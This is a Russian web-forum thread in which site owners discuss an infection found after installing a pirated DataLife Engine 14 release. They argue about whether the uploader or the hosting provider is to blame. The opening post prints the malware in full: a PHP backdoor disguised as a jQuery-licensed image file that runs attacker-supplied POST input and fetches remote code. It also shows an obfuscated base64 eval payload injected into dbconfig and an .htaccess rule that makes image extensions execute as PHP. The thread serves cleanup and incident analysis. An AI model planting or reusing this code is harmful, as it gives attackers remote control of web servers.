Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Вопрос? Вирус в новых версиях dle

Тема в разделе "Вопросы- ответы", создана пользователем PROSTO, 1 авг 2020.

01.08.20 в 07:08
12.12.20 в 06:17
46
4.754
0
  1. TopicStarter Overlay
    PROSTO

    PRO Users

    Регистрация:
    8 окт 2019
    Сообщения:
    340
    Лучших ответов:
    1
    Рейтинги:
    +99 / 17 / -0
    Всем привет. Пользуюсь чистой DLE которую выкладывал byroot версии 14.

    После создания сайта в этот же день появляется вот такой файл - /uploads/fotos/foto_84812387.jpeq (название может меняться, но формат такой же).

    С содержимом:

    <?php
    /*
    * jQuery Image Library v1.6.1
    * jQuery
    *
    * Copyright 2011, John Resig
    * Dual licensed under the MIT or GPL Version 2 licenses.
    * License | jQuery Foundation
    *
    * Includes Sizzle.js
    * jquery/sizzle
    * Copyright 2011, The Dojo Foundation
    * Released under the MIT, BSD, and GPL Licenses.
    *
    * Date: Thu May 12 15:04:36 2011 -0400
    * * * * * * * * * * * * * * * * * * * * Don't delete this file * * * * * * * * * * * * * * * *
    */
    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('max_execution_time', 0);
    @ini_set('display_errors', 0);
    @error_reporting(0);
    @set_time_limit(0);
    $cret='unct' .'ion';$cret= 'cre' . 'ate' .'_f' .$cret;
    $jQuery='sert';$jQuery='as'.$jQuery;$Libr= "_ostp";
    $sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );
    if(isset(${$sizz}['j01bt5ri3p'])){@$cret('', '};'.${$sizz}['j01bt5ri3p'].'{');}
    if(isset(${$sizz}['j01bt5ri3p'])){@$jQuery(${$sizz}['j01bt5ri3p']);}
    if((isset(${$sizz}['j01bt5ri3p']))&(isset(${$sizz}['fail']))){
    @copy('http://'.${$sizz}['fail'].'/test.txt', $_SERVER['DOCUMENT_ROOT'].'/license.php');}
    print"<!-- te"."st --> ";
    ?>

    И так на всех сайтах, где искать проблему, как чистить? Эта хрень потом вшивает в сайт dbconfig:

    $liciens = "Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6lVG1v2zYQ/is2IIQS6smOZcd2PGFbC6MLNqxbmqwY2oCgpLPEySIVkqqVjf7vO0rB0mSuv+wLj+S9PXx4d16iICaUDEJCG+0EqO7gFp6RNd/60Ww+/bYyVDGR+dH5YhSdR5Mg0KA1l4LyzPfom3fvfrrajDwF28D5cK3B/Hv/0cM0d0Hw9/d4m0pZcvDd1ei5wavzkeEV+MGr5Xw1X4zImATrA0Z7ESiOyWo6W0yi5YQEUn1Nu1ie1K5OaV3k/8IlF7PVdDJbzi+i1XyGy3IVTebL2cVsGa1m5Ah6R0js0feb69831x+1UQo++yiMbOoalE+4aqjR0Nwj70Fwt/YaxZ8cyPXmt9vN+xt6e31FUNmyqlRtm9/zAoqY8JasvULqkxmMlgWtjSn6+Oo0HgWIGNSTQwEsQ8WjKYm+43ka1pVxBTLWvDBjtytTKNLuKk1DJ3Mlnfgm2ne348u68zDF4FJI3m1Z5yB/JgGKMw2yqzzkC4Vi+0btQKQyQ+7VtjOpmWIVGFDxJ6+Eh71UGbrhQcNZo+Jz9DvyovjLJ53hm15EJ4Ux9eXYPcNxiasr4mANLTfrg9fo/DS9AnJGFejmf5CMNY76WmqfCNg19b1pyzYD02pIDBkR/RcJhnG8ZTsNwZbvgNaNoakUBoTRviua0WND9Vm7U9eJ/vCpmn68ufmV3uKJ/vB288sNues74KtqbIeuSYa1gpxWzKSFT8YJ41ljU2TQIpE7sB+iN9RudoZdCfshB2NxUEBrOaNMpYVlhZSW5xWzr6WxNcdysqxK0PEP9lrJvZUyx0OCyorxXTjmZORoD7AD8QHPcneRw95OWVmGqrGfyzCVfZCwD6zsnhusE8uFNizHnMKdeuCNaRLANUweelQyE7K0zU7mdstSSGRoNXTIHxx0zKZFmFpd8alVSRrahIu8R4mF2WF8DrIOE3yWxoz6oUqktiJTkme24lltQXHQnwYXE1uYlFqZ4G/aP6cVWLTlTKCV4LYupIAnItzkHb6YqSTDMmgwC05g/MmjNo9zt1M9gxizLBOw1xa7I+fasRNvAbKEpaWNkQrZGIuCi7Auasuy6ssdOihmcPj3CBXvU7jdYBgP3OQ7Mjwf5+7i2Jw8HA7/AGdDLmc=')));";$release_this = "cre"."ate_"."function";$dle_func = $release_this('', "$liciens;");$dle_func('');

    в результате слив трафика и метка от Яндекса...
     
  2. TopicStarter Overlay
    PROSTO

    PRO Users

    Регистрация:
    8 окт 2019
    Сообщения:
    340
    Лучших ответов:
    1
    Рейтинги:
    +99 / 17 / -0
    Такой файл появляется даже на сайтах где нет никого кроме админа, совсем...
     
  3. TopicStarter Overlay
    PROSTO

    PRO Users

    Регистрация:
    8 окт 2019
    Сообщения:
    340
    Лучших ответов:
    1
    Рейтинги:
    +99 / 17 / -0
    Также есть файл .htaccess в папке /uploads/fotos/ с содержимом:

    <FilesMatch ".([Pp][Hh][Pp]|[Cc][Gg][Ii]|[Pp][Ll]|[Pp][Hh][Ii][Mm][Ll]).?">
    Order allow,deny
    Deny from all
    </FilesMatch>
    AddHandler application/x-httpd-php .avi .jpeq .mpg4
     
  4. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    PROSTO какой хостинг? Шаред или впс? Что по логам есть касательно создания этого файла?
     
  5. TopicStarter Overlay
    PROSTO

    PRO Users

    Регистрация:
    8 окт 2019
    Сообщения:
    340
    Лучших ответов:
    1
    Рейтинги:
    +99 / 17 / -0
    VPS от Inferno, где логи найти?
     
  6. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    Вообще jpeq появляется в дистрибутивах скачанных с сайтов, указанных в теме Важно - Сайты, которые распространяют релизы dle с левым кодом

    Не хочу наговаривать, но и снова инферно... Если дистрибутив чистый был 100%, то никак подобные файлы не могут появится сами по себе. Такие же файлы появлялись в инферно, когда ТП помогала делать переносы сайтов на их сервера, но тут уж точных доказательств нет, потому что клиенты обычно не делали себе локального бекапа, чтобы сравнить его "до" и "после" заливки на сервера инферно. Может быть конечно и совпадение, я ими не пользовался, и подобного никогда не ловил на своих серверах.

    в VestaCP - открыть панель управления, WEB - домен и смотреть логи, в других панелях - не знаю, давно уже ими не пользовался.
     
  7. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    в оригинальном дистрибутиве в этой папке нет htaccess, есть в папке files такой:
    Код:
    <FilesMatch ".*">
       Order allow,deny
       Deny from all
    </FilesMatch>
    
    <FilesMatch "\.(avi|divx|mp3|mp4|flv|swf|wmv|m4v|m4a|mov|mkv|3gp|f4v)$|^$">
       Order deny,allow
       Allow from all
    </FilesMatch>
     
  8. Burial

    Burial Местный

    Регистрация:
    30 сен 2015
    Сообщения:
    1.907
    Лучших ответов:
    2
    Рейтинги:
    +445 / 70 / -0
    кстати, а что за картинки создаются в папке fotos? в установочной папке их нет. тоже глянул на всякий случай.

    Screenshot_1.jpg
     
  9. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    Burial это Аватарки пользователей
     
    • Нравится Нравится x 1
    • Смешно Смешно x 1
  10. TopicStarter Overlay
    PROSTO

    PRO Users

    Регистрация:
    8 окт 2019
    Сообщения:
    340
    Лучших ответов:
    1
    Рейтинги:
    +99 / 17 / -0
    Дистрибутив точно был установлен на сайты чистый 100%, даже есть сохраненные установочные файлы. Единственное, что нашёл, на одном из старый (мертвых) сайтов есть файлы из топика про сайты которые сливали кривые DLE, но вопрос - могут ли они заражать соседние сайты размещенные на сервере?
     
  11. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    Вероятно что могут. На шаред хостинге так же могут взламывать соседние аккаунты клиентов...
     
  12. Крути Кино

    Крути Кино Зелёный

    Регистрация:
    27 окт 2019
    Сообщения:
    8
    Лучших ответов:
    0
    Рейтинги:
    +1 / 1 / -0
    Подтверждаю byroot выложил релиз DLE 14 c вшитыми вирусами
     
    • Не согласен Не согласен x 2
    • Смешно Смешно x 1
  13. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    Крути Кино кто ещё подтверждает что я ГРЯЗЬ выкладываю?
     
  14. Крути Кино

    Крути Кино Зелёный

    Регистрация:
    27 окт 2019
    Сообщения:
    8
    Лучших ответов:
    0
    Рейтинги:
    +1 / 1 / -0
    У меня все тоже самое, что и у автора топика.
     
  15. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    2020-08-01_14-37-36.png

    В оригинальных ДЛЕ даже нет файла .htaccess в папке uploads/fotos! И уж темболее никакого упоминания jpeq нет:
    2020-08-01_14-39-41.png
     
  16. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    Сами сначала качаете ГРЯЗЬ на вышеупомянутых сайтах в теме, а потом ищите виновных! Если вам не нравятся ЧИСТЫЕ ДЛЕ оригиналы, выложенные мной, - купите лицензию, проверите архивы, которые выложены мной и которые выложены на офф сайте ДЛЕ, если найдете хоть малейшее отличие - с вас сумма тройной бессрочной лицензии! Пойдёт? В противном случае - это клевета не имеющая доказательств, и никак не связанная с ДЛЕ, что выложены в теме на форуме (ссылка в подписи).
     
    • Согласен Согласен x 1
    • Лучший Лучший x 1
  17. Крути Кино

    Крути Кино Зелёный

    Регистрация:
    27 окт 2019
    Сообщения:
    8
    Лучших ответов:
    0
    Рейтинги:
    +1 / 1 / -0
    Я поставил вашу нулед сборку на один из сайтов. Через 2 дня сразу 3 сайта оказались заражены.
     

    Вложения:

    • Не согласен Не согласен x 1
  18. TopicStarter Overlay
    PROSTO

    PRO Users

    Регистрация:
    8 окт 2019
    Сообщения:
    340
    Лучших ответов:
    1
    Рейтинги:
    +99 / 17 / -0
    А какой у тебя хостинг?
     
  19. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    Что на счёт проверки оригиналы я выкладываю или нет? Если на других сайтах грязная дле то и зараза наверное с них пролезть может.
     
  20. Крути Кино

    Крути Кино Зелёный

    Регистрация:
    27 окт 2019
    Сообщения:
    8
    Лучших ответов:
    0
    Рейтинги:
    +1 / 1 / -0
    У меня VPS Zomro. Я никого не обвиняю, возможно это стечение обстоятельств. Но факт в том, что как поставил эту сборку появились проблемы.
     
Яндекс.Метрика